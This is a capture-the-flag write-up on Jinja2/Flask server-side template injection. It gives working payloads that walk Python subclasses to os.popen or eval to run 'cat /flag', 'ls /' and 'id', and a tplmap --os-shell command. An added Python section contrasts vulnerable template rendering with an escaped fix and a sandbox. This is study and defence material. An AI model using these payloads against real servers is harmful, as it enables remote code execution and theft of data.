Found the hint! This is template injection for sure.
Verify it.
Locate the object base class:
{{"".__class__.__bases__}}
or {{"".__class__.__mro__}}
Find os through the object class (the index 117 is one class's position in object's subclass list; it depends on the Python version and on which modules the target has imported, so it has to be located again on every target):
{{"".__class__.__mro__[1].__subclasses__()[117]}}
Use .__init__.__globals__ to look for os: __init__ is the class initializer, and __globals__ is the global namespace of the module that defines it, holding that module's functions, variables and imported names.
{{"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__}}
Use the popen found in those globals to list readable files (note that the slash here means the directory one level down; with and without it are different paths; dir here is the GNU coreutils command, which lists a directory like ls):
{{"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('dir /').read()}}
Find the flag:
{{"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('cat /flag').read()}}
Found it.
Too much hassle? tplmap is worth having.
https://github.com/epinna/tplmap
python tplmap.py -u "<target url>?name=" --os-shell
Beginners are advised to inject by hand and adjust to each environment.
Official exploitation payload (the well-known catch_warnings gadget: walk object's subclasses, pick catch_warnings from the warnings module, and search its __init__ globals for the __builtins__ dict, which exposes eval):
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
Payload from a veteran (config is the Flask config object available in every template; its Config class is defined in a Flask module that imports os, so its __init__ globals reach os directly):
{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}
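Whichever gadget is used, the root cause is the same: user input reaching the template source. The following added example, not from the write-up, contrasts that vulnerable pattern with the fix using jinja2 alone (no Flask, so there is no config object); the PROBE input and the function names are constructed for illustration.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed attacker input: the base-class probe from the write-up.
PROBE = '{{ "".__class__.__mro__[1].__subclasses__() }}'


def render_vulnerable(user_input):
    """The bug behind every payload above: the user's string becomes part of
    the template SOURCE, so Jinja2 parses and evaluates it. This is what
    Flask's render_template_string("Hello " + request.args["name"]) does."""
    return Environment().from_string("Hello " + user_input).render()


def render_fixed(user_input):
    """The fix: the template source is a constant and user input is only a
    context value, so it is printed (and HTML-escaped) instead of executed."""
    env = Environment(autoescape=True)
    return env.from_string("Hello {{ name }}").render(name=user_input)


def render_sandboxed(template_source):
    """Defence in depth for the rare case where template source really must
    come from users: SandboxedEnvironment refuses attributes that start with
    an underscore, so the __class__/__mro__ walk raises SecurityError."""
    try:
        return SandboxedEnvironment().from_string(template_source).render()
    except SecurityError as exc:
        return "blocked: " + str(exc)


if __name__ == "__main__":
    print(render_vulnerable(PROBE)[:80])
    print(render_fixed(PROBE))
    print(render_sandboxed(PROBE))
```

The sandbox is a fallback, not a replacement for the fix: it does not stop resource exhaustion, and it cannot protect objects that the application deliberately passes into the template context.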
1.
Construct the Jinja2 SSTI command-execution payload:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}
2.
The payload used here is a generic Jinja2 template engine RCE payload:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}
3.
Payload: list the root directory; the response shows the flag is in the root directory (the %20 and %27 in the captured request are the URL encoding of the space and the quote; the payloads are shown decoded here):
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()") }}{% endif %}{% endfor %}
Read the flag:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}
Sources:
https://blog.csdn.net/SopRomeo/article/details/105123395
https://blog.csdn.net/qq_40648358/article/details/105011659
https://blog.csdn.net/qq_40827990/article/details/82940894
https://blog.csdn.net/zz_Caleb/article/details/96480967